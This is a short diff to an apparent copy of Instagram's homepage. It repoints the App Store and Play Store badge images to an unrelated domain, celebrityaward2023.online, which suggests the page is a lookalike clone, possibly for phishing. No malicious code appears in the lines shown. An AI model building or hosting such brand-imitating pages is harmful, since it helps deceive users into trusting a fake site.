--- a/instagram.com/index.html
+++ b/instagram.com/index.html
@@ -54,8 +54,8 @@
       <div class="apps">
         <p>Get the app.</p>
         <div class="app-stores">
-          <a href="https://apps.apple.com/ng/app/instagram/id389801252"><img src="images/app-store.svg" alt="App Store"></a>
-          <a href="https://play.google.com/store/apps/details?id=com.instagram.android&hl=en&gl=US"><img src="images/play-store.svg" alt="Play Store"></a>
+          <a href="https://apps.apple.com/ng/app/instagram/id389801252"><img src="https://www.celebrityaward2023.online/instagram.com/images/app-store.svg" alt="App Store"></a>
+          <a href="https://play.google.com/store/apps/details?id=com.instagram.android&hl=en&gl=US"><img src="https://www.celebrityaward2023.online/instagram.com/images/play-store.svg" alt="Play Store"></a>
         </div>
       </div>
     </div>
